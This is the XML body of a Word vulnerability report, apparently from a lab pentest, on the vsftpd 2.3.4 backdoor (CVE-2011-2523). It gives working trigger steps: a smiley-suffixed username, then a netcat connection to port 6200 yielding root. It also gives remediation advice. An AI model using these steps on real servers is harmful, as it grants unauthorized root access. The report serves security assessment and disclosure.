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AFD40" w14:textId="77777777" w:rsidR="00A23B09" w:rsidRPr="00A23B09" w:rsidRDefault="00A23B09" w:rsidP="00A23B09">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A23B09">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Report: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A23B09">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A23B09">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.3.4 - Backdoored FTP Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D25080" w14:textId="264E71C3" w:rsidR="00A23B09" w:rsidRPr="00A23B09" w:rsidRDefault="00A23B09" w:rsidP="00A23B09">
      <w:r w:rsidRPr="00A23B09">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Severity</w:t>
      </w:r>
      <w:r w:rsidRPr="00A23B09">
        <w:t>:  Critical</w:t>
      </w:r>
      <w:r w:rsidRPr="00A23B09">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00A23B09">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tool Used</w:t>
      </w:r>
      <w:r w:rsidRPr="00A23B09">
        <w:t xml:space="preserve">: Nmap + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A23B09">
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A23B09">
        <w:t xml:space="preserve"> + Manual Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227451EE" w14:textId="7A9C5435" w:rsidR="00A23B09" w:rsidRPr="00A23B09" w:rsidRDefault="00A23B09" w:rsidP="00A23B09">
      <w:r w:rsidRPr="00A23B09">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CVE: CVE-2011-2523</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6377DC18" w14:textId="30B13C03" w:rsidR="00A23B09" w:rsidRPr="00A23B09" w:rsidRDefault="00A23B09" w:rsidP="00A23B09">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A23B09">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Risk Description:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08436D3F" w14:textId="77777777" w:rsidR="00A23B09" w:rsidRPr="00A23B09" w:rsidRDefault="00A23B09" w:rsidP="00A23B09">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A23B09">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A23B09">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.3.4</w:t>
      </w:r>
      <w:r w:rsidRPr="00A23B09">
        <w:t xml:space="preserve"> contains a </w:t>
      </w:r>
      <w:r w:rsidRPr="00A23B09">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>backdoor planted by an attacker</w:t>
      </w:r>
      <w:r w:rsidRPr="00A23B09">
        <w:t xml:space="preserve"> in a compromised version of the binary. When a username contains a smiley :), the backdoor opens a </w:t>
      </w:r>
      <w:r w:rsidRPr="00A23B09">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bind shell on TCP port 6200</w:t>
      </w:r>
      <w:r w:rsidRPr="00A23B09">
        <w:t xml:space="preserve"> — giving </w:t>
      </w:r>
      <w:r w:rsidRPr="00A23B09">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>unauthenticated remote root shell access</w:t>
      </w:r>
      <w:r w:rsidRPr="00A23B09">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC2CC47" w14:textId="77777777" w:rsidR="00A23B09" w:rsidRPr="00A23B09" w:rsidRDefault="00A23B09" w:rsidP="00A23B09">
      <w:r w:rsidRPr="00A23B09">
        <w:t xml:space="preserve">This is not a misconfiguration or bug — it’s an </w:t>
      </w:r>
      <w:r w:rsidRPr="00A23B09">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>intentional trojan</w:t>
      </w:r>
      <w:r w:rsidRPr="00A23B09">
        <w:t xml:space="preserve"> embedded into the service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552370B8" w14:textId="5A5777A1" w:rsidR="00A23B09" w:rsidRPr="00A23B09" w:rsidRDefault="00A23B09" w:rsidP="00A23B09"/>
    <w:p w14:paraId="4BA83423" w14:textId="48437317" w:rsidR="00A23B09" w:rsidRPr="00A23B09" w:rsidRDefault="00A23B09" w:rsidP="00A23B09">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A23B09">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploitation Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE4EEC5" w14:textId="77777777" w:rsidR="00A23B09" w:rsidRPr="00A23B09" w:rsidRDefault="00A23B09" w:rsidP="00A23B09">
      <w:r w:rsidRPr="00A23B09">
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:r w:rsidRPr="00A23B09">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>anonymous login</w:t>
      </w:r>
      <w:r w:rsidRPr="00A23B09">
        <w:t xml:space="preserve"> and a crafted username to trigger the bind shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA8BD0D" w14:textId="77777777" w:rsidR="00A23B09" w:rsidRPr="00A23B09" w:rsidRDefault="00A23B09" w:rsidP="00A23B09">
      <w:r w:rsidRPr="00A23B09">
        <w:pict w14:anchorId="4F65E487">
          <v:rect id="_x0000_i1063" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0769927D" w14:textId="531ADAA9" w:rsidR="00A23B09" w:rsidRPr="00A23B09" w:rsidRDefault="00A23B09" w:rsidP="00A23B09">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A23B09">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Proof of Concept (Against: 192.168.254.144)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78257523" w14:textId="200F00BF" w:rsidR="00A23B09" w:rsidRPr="00A23B09" w:rsidRDefault="00A23B09" w:rsidP="00A23B09">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A23B09">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Connect to FTP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500BB49A" w14:textId="77777777" w:rsidR="00A23B09" w:rsidRPr="00A23B09" w:rsidRDefault="00A23B09" w:rsidP="00A23B09">
      <w:r w:rsidRPr="00A23B09">
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1C5F92" w14:textId="77777777" w:rsidR="00A23B09" w:rsidRPr="00A23B09" w:rsidRDefault="00A23B09" w:rsidP="00A23B09">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A23B09">
        <w:t>CopyEdit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="178B45E6" w14:textId="77777777" w:rsidR="00A23B09" w:rsidRPr="00A23B09" w:rsidRDefault="00A23B09" w:rsidP="00A23B09">
      <w:r w:rsidRPr="00A23B09">
        <w:t>ftp 192.168.254.144</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BA04C5" w14:textId="77777777" w:rsidR="00432E79" w:rsidRDefault="00432E79" w:rsidP="00A23B09">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="550544B9" w14:textId="3F7C2591" w:rsidR="00A23B09" w:rsidRPr="00A23B09" w:rsidRDefault="00A23B09" w:rsidP="00A23B09">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A23B09">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Login with malicious username:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462A4194" w14:textId="77777777" w:rsidR="00A23B09" w:rsidRPr="00A23B09" w:rsidRDefault="00A23B09" w:rsidP="00A23B09">
      <w:r w:rsidRPr="00A23B09">
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E229278" w14:textId="77777777" w:rsidR="00A23B09" w:rsidRPr="00A23B09" w:rsidRDefault="00A23B09" w:rsidP="00A23B09">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A23B09">
        <w:t>CopyEdit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6F59FF46" w14:textId="77777777" w:rsidR="00A23B09" w:rsidRPr="00A23B09" w:rsidRDefault="00A23B09" w:rsidP="00A23B09">
      <w:r w:rsidRPr="00A23B09">
        <w:t>Name: anonymous:)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA32008" w14:textId="77777777" w:rsidR="00A23B09" w:rsidRPr="00A23B09" w:rsidRDefault="00A23B09" w:rsidP="00A23B09">
      <w:r w:rsidRPr="00A23B09">
        <w:t>Password: (just press Enter)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F10B9A3" w14:textId="18D5D315" w:rsidR="00A23B09" w:rsidRPr="00A23B09" w:rsidRDefault="00A23B09" w:rsidP="00A23B09">
      <w:r w:rsidRPr="00A23B09">
        <w:t xml:space="preserve">The service will appear to freeze or disconnect — that’s the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A23B09">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>trigger</w:t>
      </w:r>
      <w:r w:rsidRPr="00A23B09">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAE56D1" w14:textId="78B1329B" w:rsidR="00A23B09" w:rsidRPr="00A23B09" w:rsidRDefault="00A23B09" w:rsidP="00A23B09"/>
    <w:p w14:paraId="2E455709" w14:textId="3355ABEB" w:rsidR="00A23B09" w:rsidRPr="00A23B09" w:rsidRDefault="00A23B09" w:rsidP="00A23B09">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A23B09">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Connect to the Backdoor Shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3528B635" w14:textId="77777777" w:rsidR="00A23B09" w:rsidRPr="00A23B09" w:rsidRDefault="00A23B09" w:rsidP="00A23B09">
      <w:r w:rsidRPr="00A23B09">
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E2E318" w14:textId="77777777" w:rsidR="00A23B09" w:rsidRPr="00A23B09" w:rsidRDefault="00A23B09" w:rsidP="00A23B09">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A23B09">
        <w:t>CopyEdit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1C2F19BD" w14:textId="77777777" w:rsidR="00A23B09" w:rsidRPr="00A23B09" w:rsidRDefault="00A23B09" w:rsidP="00A23B09">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A23B09">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A23B09">
        <w:t xml:space="preserve"> 192.168.254.144 6200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FB319D" w14:textId="77777777" w:rsidR="00A23B09" w:rsidRPr="00A23B09" w:rsidRDefault="00A23B09" w:rsidP="00A23B09">
      <w:r w:rsidRPr="00A23B09">
        <w:t>If successful, you'll get:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AB3897" w14:textId="77777777" w:rsidR="00A23B09" w:rsidRPr="00A23B09" w:rsidRDefault="00A23B09" w:rsidP="00A23B09">
      <w:r w:rsidRPr="00A23B09">
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A6C98D" w14:textId="77777777" w:rsidR="00A23B09" w:rsidRPr="00A23B09" w:rsidRDefault="00A23B09" w:rsidP="00A23B09">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A23B09">
        <w:lastRenderedPageBreak/>
        <w:t>CopyEdit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="108F181E" w14:textId="77777777" w:rsidR="00A23B09" w:rsidRPr="00A23B09" w:rsidRDefault="00A23B09" w:rsidP="00A23B09">
      <w:r w:rsidRPr="00A23B09">
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A23B09">
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5C9CEDF8" w14:textId="77777777" w:rsidR="00A23B09" w:rsidRPr="00A23B09" w:rsidRDefault="00A23B09" w:rsidP="00A23B09">
      <w:r w:rsidRPr="00A23B09">
        <w:t>root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B623058" w14:textId="5FF39F49" w:rsidR="00A23B09" w:rsidRPr="00A23B09" w:rsidRDefault="00A23B09" w:rsidP="00A23B09">
      <w:r w:rsidRPr="00A23B09">
        <w:t>Confirmed: Remote root access via backdoor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E54D00" w14:textId="40EF5527" w:rsidR="00A23B09" w:rsidRPr="00A23B09" w:rsidRDefault="00A23B09" w:rsidP="00A23B09"/>
    <w:p w14:paraId="07C7D936" w14:textId="54F5AF05" w:rsidR="00A23B09" w:rsidRPr="00A23B09" w:rsidRDefault="00A23B09" w:rsidP="00A23B09">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A23B09">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Remediation Advice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E4A8CA" w14:textId="67438353" w:rsidR="00A23B09" w:rsidRPr="00A23B09" w:rsidRDefault="00A23B09" w:rsidP="00A23B09">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A23B09">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Immediate action</w:t>
      </w:r>
      <w:r w:rsidRPr="00A23B09">
        <w:t xml:space="preserve">: Remove </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A23B09">
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A23B09">
        <w:t xml:space="preserve"> 2.3.4 entirely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172BFB64" w14:textId="1434A04E" w:rsidR="00A23B09" w:rsidRPr="00A23B09" w:rsidRDefault="00A23B09" w:rsidP="00A23B09">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A23B09">
        <w:t xml:space="preserve"> Replace with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A23B09">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A23B09">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.x</w:t>
      </w:r>
      <w:r w:rsidRPr="00A23B09">
        <w:t xml:space="preserve"> or a secure SFTP implementation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D57F30A" w14:textId="41F68589" w:rsidR="00A23B09" w:rsidRPr="00A23B09" w:rsidRDefault="00A23B09" w:rsidP="00A23B09">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A23B09">
        <w:t xml:space="preserve"> Verify package source and hash against </w:t>
      </w:r>
      <w:r w:rsidRPr="00A23B09">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>official repositories</w:t>
      </w:r>
      <w:r w:rsidRPr="00A23B09">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02137398" w14:textId="296DB143" w:rsidR="00A23B09" w:rsidRPr="00A23B09" w:rsidRDefault="00A23B09" w:rsidP="00A23B09">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A23B09">
        <w:t xml:space="preserve"> Check for PORT 6200 bindings and unknown reverse shells.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F464118" w14:textId="70361EAB" w:rsidR="00A23B09" w:rsidRPr="00A23B09" w:rsidRDefault="00A23B09" w:rsidP="00A23B09">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A23B09">
        <w:t xml:space="preserve"> Conduct incident response if this version was ever internet-facing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053C1C60" w14:textId="38A281ED" w:rsidR="00A23B09" w:rsidRPr="00A23B09" w:rsidRDefault="00A23B09" w:rsidP="00A23B09"/>
    <w:p w14:paraId="6E195382" w14:textId="133022F9" w:rsidR="00A23B09" w:rsidRPr="00A23B09" w:rsidRDefault="00A23B09" w:rsidP="00A23B09">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A23B09">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA58AC0" w14:textId="77777777" w:rsidR="00A23B09" w:rsidRPr="00A23B09" w:rsidRDefault="00A23B09" w:rsidP="00A23B09">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId5" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00A23B09">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>CVE-2011-2523 – NIST NVD</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="55C8D093" w14:textId="77777777" w:rsidR="00A23B09" w:rsidRPr="00A23B09" w:rsidRDefault="00A23B09" w:rsidP="00A23B09">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A23B09">
        <w:t>Backdoor Discovery Blog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F675AA" w14:textId="77777777" w:rsidR="00A23B09" w:rsidRPr="00A23B09" w:rsidRDefault="00A23B09" w:rsidP="00A23B09">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A23B09">
        <w:t>Metasploit Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0963616A" w14:textId="77777777" w:rsidR="00C72686" w:rsidRDefault="00C72686"/>
    <w:sectPr w:rsidR="00C726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47EF7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="46DA9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4C5A2F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EB40B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5149900">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="18144485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B09"/>
    <w:rsid w:val="00432E79"/>
    <w:rsid w:val="005B12F0"/>
    <w:rsid w:val="00963FEA"/>
    <w:rsid w:val="00A23B09"/>
    <w:rsid w:val="00C72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2FE60"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{34679889-A1EC-4FDC-8F7D-A8D8B396E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3B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3B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3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9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86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40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0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9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0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2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3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07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61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46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5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4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2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9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34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2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1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79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96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6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59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23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85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8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07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6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79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2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vd.nist.gov/vuln/detail/CVE-2011-252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Harvik Prajapati</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Harvik Prajapati</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-06-11T17:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-06-11T17:07:00Z</dcterms:modified>
</cp:coreProperties>
</file>